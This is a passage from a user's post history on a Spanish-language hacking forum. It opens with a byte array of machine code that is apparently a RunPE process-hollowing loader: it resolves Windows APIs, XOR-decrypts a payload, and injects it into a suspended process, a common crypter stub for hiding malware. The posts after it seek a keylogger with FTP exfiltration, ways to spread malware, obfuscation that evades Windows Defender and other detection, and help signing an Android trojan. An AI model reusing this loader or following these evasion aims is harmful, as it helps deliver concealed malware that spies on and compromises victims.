$C6,$45,$9E,$6C,$C6,$45,$9F,$65,$C6,$45,$A0,$48,$C6,$45,$A1,$61,$C6,$45,$A2,$6E,$C6,$45,$A3,$64,$C6,
$45,$A4,$6C,$C6,$45,$A5,$65,$C6,$45,$A6,$41,$C6,$45,$A7,$00,$C6,$45,$84,$47,$C6,$45,$85,$65,$C6,$45,
$86,$74,$C6,$45,$87,$4D,$C6,$45,$88,$6F,$C6,$45,$89,$64,$C6,$45,$8A,$75,$C6,$45,$8B,$6C,$C6,$45,$8C,
$65,$C6,$45,$8D,$46,$C6,$45,$8E,$69,$C6,$45,$8F,$6C,$C6,$45,$90,$65,$C6,$45,$91,$4E,$C6,$45,$92,$61,
$C6,$45,$93,$6D,$C6,$45,$94,$65,$C6,$45,$95,$41,$C6,$45,$96,$00,$C6,$85,$6F,$FF,$FF,$FF,$5A,$C6,$85,
$70,$FF,$FF,$FF,$77,$C6,$85,$71,$FF,$FF,$FF,$55,$C6,$85,$72,$FF,$FF,$FF,$6E,$C6,$85,$73,$FF,$FF,$FF,
$6D,$C6,$85,$74,$FF,$FF,$FF,$61,$C6,$85,$75,$FF,$FF,$FF,$70,$C6,$85,$76,$FF,$FF,$FF,$56,$C6,$85,$77,
$FF,$FF,$FF,$69,$C6,$85,$78,$FF,$FF,$FF,$65,$C6,$85,$79,$FF,$FF,$FF,$77,$C6,$85,$7A,$FF,$FF,$FF,$4F,
$C6,$85,$7B,$FF,$FF,$FF,$66,$C6,$85,$7C,$FF,$FF,$FF,$53,$C6,$85,$7D,$FF,$FF,$FF,$65,$C6,$85,$7E,$FF,
$FF,$FF,$63,$C6,$85,$7F,$FF,$FF,$FF,$74,$C6,$45,$80,$69,$C6,$45,$81,$6F,$C6,$45,$82,$6E,$C6,$45,$83,
$00,$C6,$85,$60,$FF,$FF,$FF,$56,$C6,$85,$61,$FF,$FF,$FF,$69,$C6,$85,$62,$FF,$FF,$FF,$72,$C6,$85,$63,
$FF,$FF,$FF,$74,$C6,$85,$64,$FF,$FF,$FF,$75,$C6,$85,$65,$FF,$FF,$FF,$61,$C6,$85,$66,$FF,$FF,$FF,$6C,
$C6,$85,$67,$FF,$FF,$FF,$41,$C6,$85,$68,$FF,$FF,$FF,$6C,$C6,$85,$69,$FF,$FF,$FF,$6C,$C6,$85,$6A,$FF,
$FF,$FF,$6F,$C6,$85,$6B,$FF,$FF,$FF,$63,$C6,$85,$6C,$FF,$FF,$FF,$45,$C6,$85,$6D,$FF,$FF,$FF,$78,$C6,
$85,$6E,$FF,$FF,$FF,$00,$C6,$85,$4F,$FF,$FF,$FF,$56,$C6,$85,$50,$FF,$FF,$FF,$69,$C6,$85,$51,$FF,$FF,
$FF,$72,$C6,$85,$52,$FF,$FF,$FF,$74,$C6,$85,$53,$FF,$FF,$FF,$75,$C6,$85,$54,$FF,$FF,$FF,$61,$C6,$85,
$55,$FF,$FF,$FF,$6C,$C6,$85,$56,$FF,$FF,$FF,$50,$C6,$85,$57,$FF,$FF,$FF,$72,$C6,$85,$58,$FF,$FF,$FF,
$6F,$C6,$85,$59,$FF,$FF,$FF,$74,$C6,$85,$5A,$FF,$FF,$FF,$65,$C6,$85,$5B,$FF,$FF,$FF,$63,$C6,$85,$5C,
$FF,$FF,$FF,$74,$C6,$85,$5D,$FF,$FF,$FF,$45,$C6,$85,$5E,$FF,$FF,$FF,$78,$C6,$85,$5F,$FF,$FF,$FF,$00,
$C6,$85,$3D,$FF,$FF,$FF,$52,$C6,$85,$3E,$FF,$FF,$FF,$65,$C6,$85,$3F,$FF,$FF,$FF,$61,$C6,$85,$40,$FF,
$FF,$FF,$64,$C6,$85,$41,$FF,$FF,$FF,$50,$C6,$85,$42,$FF,$FF,$FF,$72,$C6,$85,$43,$FF,$FF,$FF,$6F,$C6,
$85,$44,$FF,$FF,$FF,$63,$C6,$85,$45,$FF,$FF,$FF,$65,$C6,$85,$46,$FF,$FF,$FF,$73,$C6,$85,$47,$FF,$FF,
$FF,$73,$C6,$85,$48,$FF,$FF,$FF,$4D,$C6,$85,$49,$FF,$FF,$FF,$65,$C6,$85,$4A,$FF,$FF,$FF,$6D,$C6,$85,
$4B,$FF,$FF,$FF,$6F,$C6,$85,$4C,$FF,$FF,$FF,$72,$C6,$85,$4D,$FF,$FF,$FF,$79,$C6,$85,$4E,$FF,$FF,$FF,
$00,$C6,$85,$2A,$FF,$FF,$FF,$57,$C6,$85,$2B,$FF,$FF,$FF,$72,$C6,$85,$2C,$FF,$FF,$FF,$69,$C6,$85,$2D,
$FF,$FF,$FF,$74,$C6,$85,$2E,$FF,$FF,$FF,$65,$C6,$85,$2F,$FF,$FF,$FF,$50,$C6,$85,$30,$FF,$FF,$FF,$72,
$C6,$85,$31,$FF,$FF,$FF,$6F,$C6,$85,$32,$FF,$FF,$FF,$63,$C6,$85,$33,$FF,$FF,$FF,$65,$C6,$85,$34,$FF,
$FF,$FF,$73,$C6,$85,$35,$FF,$FF,$FF,$73,$C6,$85,$36,$FF,$FF,$FF,$4D,$C6,$85,$37,$FF,$FF,$FF,$65,$C6,
$85,$38,$FF,$FF,$FF,$6D,$C6,$85,$39,$FF,$FF,$FF,$6F,$C6,$85,$3A,$FF,$FF,$FF,$72,$C6,$85,$3B,$FF,$FF,
$FF,$79,$C6,$85,$3C,$FF,$FF,$FF,$00,$C6,$85,$19,$FF,$FF,$FF,$47,$C6,$85,$1A,$FF,$FF,$FF,$65,$C6,$85,
$1B,$FF,$FF,$FF,$74,$C6,$85,$1C,$FF,$FF,$FF,$54,$C6,$85,$1D,$FF,$FF,$FF,$68,$C6,$85,$1E,$FF,$FF,$FF,
$72,$C6,$85,$1F,$FF,$FF,$FF,$65,$C6,$85,$20,$FF,$FF,$FF,$61,$C6,$85,$21,$FF,$FF,$FF,$64,$C6,$85,$22,
$FF,$FF,$FF,$43,$C6,$85,$23,$FF,$FF,$FF,$6F,$C6,$85,$24,$FF,$FF,$FF,$6E,$C6,$85,$25,$FF,$FF,$FF,$74,
$C6,$85,$26,$FF,$FF,$FF,$65,$C6,$85,$27,$FF,$FF,$FF,$78,$C6,$85,$28,$FF,$FF,$FF,$74,$C6,$85,$29,$FF,
$FF,$FF,$00,$C6,$85,$08,$FF,$FF,$FF,$53,$C6,$85,$09,$FF,$FF,$FF,$65,$C6,$85,$0A,$FF,$FF,$FF,$74,$C6,
$85,$0B,$FF,$FF,$FF,$54,$C6,$85,$0C,$FF,$FF,$FF,$68,$C6,$85,$0D,$FF,$FF,$FF,$72,$C6,$85,$0E,$FF,$FF,
$FF,$65,$C6,$85,$0F,$FF,$FF,$FF,$61,$C6,$85,$10,$FF,$FF,$FF,$64,$C6,$85,$11,$FF,$FF,$FF,$43,$C6,$85,
$12,$FF,$FF,$FF,$6F,$C6,$85,$13,$FF,$FF,$FF,$6E,$C6,$85,$14,$FF,$FF,$FF,$74,$C6,$85,$15,$FF,$FF,$FF,
$65,$C6,$85,$16,$FF,$FF,$FF,$78,$C6,$85,$17,$FF,$FF,$FF,$74,$C6,$85,$18,$FF,$FF,$FF,$00,$C6,$85,$FB,
$FE,$FF,$FF,$52,$C6,$85,$FC,$FE,$FF,$FF,$65,$C6,$85,$FD,$FE,$FF,$FF,$73,$C6,$85,$FE,$FE,$FF,$FF,$75,
$C6,$85,$FF,$FE,$FF,$FF,$6D,$C6,$85,$00,$FF,$FF,$FF,$65,$C6,$85,$01,$FF,$FF,$FF,$54,$C6,$85,$02,$FF,
$FF,$FF,$68,$C6,$85,$03,$FF,$FF,$FF,$72,$C6,$85,$04,$FF,$FF,$FF,$65,$C6,$85,$05,$FF,$FF,$FF,$61,$C6,
$85,$06,$FF,$FF,$FF,$64,$C6,$85,$07,$FF,$FF,$FF,$00,$C6,$45,$E2,$6E,$C6,$45,$E3,$74,$C6,$45,$E4,$64,
$C6,$45,$E5,$6C,$C6,$45,$E6,$6C,$C6,$45,$E7,$00,$C6,$85,$EC,$FE,$FF,$FF,$43,$C6,$85,$ED,$FE,$FF,$FF,
$72,$C6,$85,$EE,$FE,$FF,$FF,$65,$C6,$85,$EF,$FE,$FF,$FF,$61,$C6,$85,$F0,$FE,$FF,$FF,$74,$C6,$85,$F1,
$FE,$FF,$FF,$65,$C6,$85,$F2,$FE,$FF,$FF,$50,$C6,$85,$F3,$FE,$FF,$FF,$72,$C6,$85,$F4,$FE,$FF,$FF,$6F,
$C6,$85,$F5,$FE,$FF,$FF,$63,$C6,$85,$F6,$FE,$FF,$FF,$65,$C6,$85,$F7,$FE,$FF,$FF,$73,$C6,$85,$F8,$FE,
$FF,$FF,$73,$C6,$85,$F9,$FE,$FF,$FF,$41,$C6,$85,$FA,$FE,$FF,$FF,$00,$C6,$85,$DF,$FE,$FF,$FF,$4C,$C6,
$85,$E0,$FE,$FF,$FF,$6F,$C6,$85,$E1,$FE,$FF,$FF,$61,$C6,$85,$E2,$FE,$FF,$FF,$64,$C6,$85,$E3,$FE,$FF,
$FF,$4C,$C6,$85,$E4,$FE,$FF,$FF,$69,$C6,$85,$E5,$FE,$FF,$FF,$62,$C6,$85,$E6,$FE,$FF,$FF,$72,$C6,$85,
$E7,$FE,$FF,$FF,$61,$C6,$85,$E8,$FE,$FF,$FF,$72,$C6,$85,$E9,$FE,$FF,$FF,$79,$C6,$85,$EA,$FE,$FF,$FF,
$41,$C6,$85,$EB,$FE,$FF,$FF,$00,$8D,$85,$DF,$FE,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$E8,
$8B,$75,$0C,$4E,$85,$F6,$7C,$17,$46,$33,$DB,$8B,$45,$08,$8A,$04,$03,$34,$2A,$34,$87,$8B,$55,$08,$88,
$04,$13,$43,$4E,$75,$EC,$8B,$45,$08,$89,$45,$AC,$8D,$45,$97,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,
$8D,$45,$84,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$F0,$6A,$69,$8D,$85,$8B,$FC,$FF,$FF,$50,$6A,$00,$FF,
$D3,$50,$FF,$D6,$8D,$85,$7C,$FE,$FF,$FF,$BB,$43,$00,$00,$00,$C6,$04,$03,$00,$4B,$83,$FB,$FF,$75,$F6,
$C7,$85,$7C,$FE,$FF,$FF,$44,$00,$00,$00,$8D,$85,$EC,$FE,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,
$D8,$8D,$85,$C0,$FE,$FF,$FF,$50,$8D,$85,$7C,$FE,$FF,$FF,$50,$6A,$00,$6A,$00,$6A,$04,$6A,$00,$6A,$00,
$6A,$00,$8D,$85,$8B,$FC,$FF,$FF,$50,$6A,$00,$FF,$D3,$8D,$85,$19,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,
$55,$EC,$8B,$D8,$C7,$85,$B0,$FD,$FF,$FF,$07,$00,$01,$00,$8D,$85,$B0,$FD,$FF,$FF,$50,$8B,$85,$C4,$FE,
$FF,$FF,$50,$FF,$D3,$8D,$85,$3D,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$8D,$45,$D0,$50,
$6A,$04,$8D,$45,$C8,$50,$8B,$85,$54,$FE,$FF,$FF,$83,$C0,$08,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,
$8D,$85,$6F,$FF,$FF,$FF,$50,$8D,$45,$E2,$50,$FF,$55,$E8,$50,$FF,$55,$EC,$8B,$D8,$8B,$45,$C8,$50,$8B,
$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,$8B,$45,$AC,$8B,$40,$3C,$03,$45,$AC,$89,$45,$D4,$8D,$85,$60,$FF,$FF,
$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$6A,$40,$68,$00,$30,$00,$00,$8B,$45,$D4,$8B,$40,$50,$50,
$8B,$45,$D4,$8B,$40,$34,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$D3,$89,$45,$C8,$8D,$85,$2A,$FF,$FF,$FF,
$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$F4,$8D,$45,$CC,$50,$8B,$45,$D4,$8B,$40,$54,$50,$8B,$45,$AC,
$50,$8B,$45,$C8,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8B,$45,$D4,$8D,$78,$18,$8B,$45,$D4,$0F,
$B7,$40,$14,$03,$F8,$8D,$85,$4F,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,$89,$45,$F8,$C7,$85,$90,
$FD,$FF,$FF,$01,$00,$00,$00,$C7,$85,$94,$FD,$FF,$FF,$10,$00,$00,$00,$C7,$85,$98,$FD,$FF,$FF,$02,$00,
$00,$00,$C7,$85,$9C,$FD,$FF,$FF,$20,$00,$00,$00,$C7,$85,$A0,$FD,$FF,$FF,$04,$00,$00,$00,$C7,$85,$A4,
$FD,$FF,$FF,$40,$00,$00,$00,$C7,$85,$A8,$FD,$FF,$FF,$04,$00,$00,$00,$C7,$85,$AC,$FD,$FF,$FF,$40,$00,
$00,$00,$8B,$45,$D4,$0F,$B7,$70,$06,$4E,$85,$F6,$7C,$66,$46,$33,$DB,$8D,$45,$CC,$50,$8D,$04,$9B,$8B,
$44,$C7,$10,$50,$8D,$04,$9B,$8B,$44,$C7,$14,$03,$45,$AC,$50,$8D,$04,$9B,$8B,$44,$C7,$0C,$03,$45,$C8,
$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8D,$45,$C4,$50,$8D,$04,$9B,$8B,$44,$C7,$24,$C1,$E8,$1D,
$8B,$84,$85,$90,$FD,$FF,$FF,$50,$8D,$04,$9B,$8B,$44,$C7,$08,$50,$8D,$04,$9B,$8B,$44,$C7,$0C,$03,$45,
$C8,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F8,$43,$4E,$75,$9D,$8D,$45,$CC,$50,$6A,$04,$8D,$45,$C8,
$50,$8B,$85,$54,$FE,$FF,$FF,$83,$C0,$08,$50,$8B,$85,$C0,$FE,$FF,$FF,$50,$FF,$55,$F4,$8B,$45,$D4,$8B,
$40,$28,$03,$45,$C8,$89,$85,$60,$FE,$FF,$FF,$8D,$85,$08,$FF,$FF,$FF,$50,$8B,$45,$FC,$50,$FF,$55,$EC,
$8B,$D8,$8D,$85,$B0,$FD,$FF,$FF,$50,$8B,$85,$C4,$FE,$FF,$FF,$50,$FF,$D3,$8D,$85,$FB,$FE,$FF,$FF,$50,
$8B,$45,$FC,$50,$FF,$55,$EC,$8B,$D8,$8B,$85,$C4,$FE,$FF,$FF,$50,$FF,$D3,$5F,$5E,$5B,$8B,$E5,$5D,$C2,
$08,$00
); #28
Dudas y pedidos generales / Re:quien tiene el ardamax keylogger?
Abril 03, 2018, 10:21:25 AM
Impresionante amigo @You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login A I L una buena coleccion por lo que veo. Una pregunta todos esos ficheros estan analizados y limpios o hace falta usar virtual? gracias.
#29
Dudas y pedidos generales / [SOLUCIONADO] quien tiene el ardamax keylogger?
Abril 02, 2018, 07:46:40 PM
alguien sabe algun buen keylogger con ftp es para educational purposes.
#30
Hacking / una forma más simple de encontrar 0day [INGLES]
Abril 01, 2018, 02:38:29 PM
#31
Dudas y pedidos generales / algun metodo para spread?
Marzo 19, 2018, 10:42:46 AM
quiero hacer spread consejos?
#32
Dudas y pedidos generales / confuserex bypasea defender?
Marzo 16, 2018, 07:30:55 PM
mi pregunta es si ofusco con confuserex bypaseara defender?
#33
Android / Re:Lucky Patcher v5.4.5 [APK] [Multi] [MG]
Marzo 13, 2018, 07:17:30 PM
y para que sirve que utilidad tiene romper la seguridad de todas las aplicaciones o cuales?
#34
Bugs y Exploits / Re:EternalRomance EternalSynergy y EternalChampion | Exploits de la NSA
Marzo 13, 2018, 07:14:03 PM
todo parcheado saludos.
#35
Dudas y pedidos generales / ofuscar strings o variables autoit
Marzo 09, 2018, 04:13:37 PM
algun simple script que genere las string ofuscadas en autoit?
tendre un au3 quiero generar un au3 con las string ofuscadas.
y si es posible ponerle algo mas se agradece tambien.
tendre un au3 quiero generar un au3 con las string ofuscadas.
y si es posible ponerle algo mas se agradece tambien.
#36
Otros lenguajes Scripting / Re:[SOURCE]Generador de codigo basura
Marzo 08, 2018, 07:05:19 PM
hola podrias decirme donde esta tu post sobre vbs? para poner 60000 comentarios en un vbs??
#37
Otros lenguajes Scripting / Re:[SOURCE]Generador de codigo basura
Febrero 09, 2018, 12:52:44 AM
si pones eso bypaseará chrome ? porque muchos autoit los marca siempre.
#38
Bugs y Exploits / Re:Encontrar shells en paginas web con Fwshell
Febrero 08, 2018, 05:03:04 PM
gracis por compartir.!
#39
Análisis y desarrollo de malwares / Re:Spy Note 5.0 (Troyano Android)
Febrero 08, 2018, 02:30:07 PM
todo muy bien amigo ahora como firmo digitalmente la aplicacion
#40
Debates, Reviews y Opiniones / Nuevo diseño en el foro?
Julio 18, 2017, 11:56:51 AM
Hola entré hace poco y vi que el foro dio un cambiazo en cuanto al aspecto. la verdad que me ha gustado mucho más cuand o lo he visto.
¿Que os parece a vosotros el nuevo diseño?
¿Que os parece a vosotros el nuevo diseño?
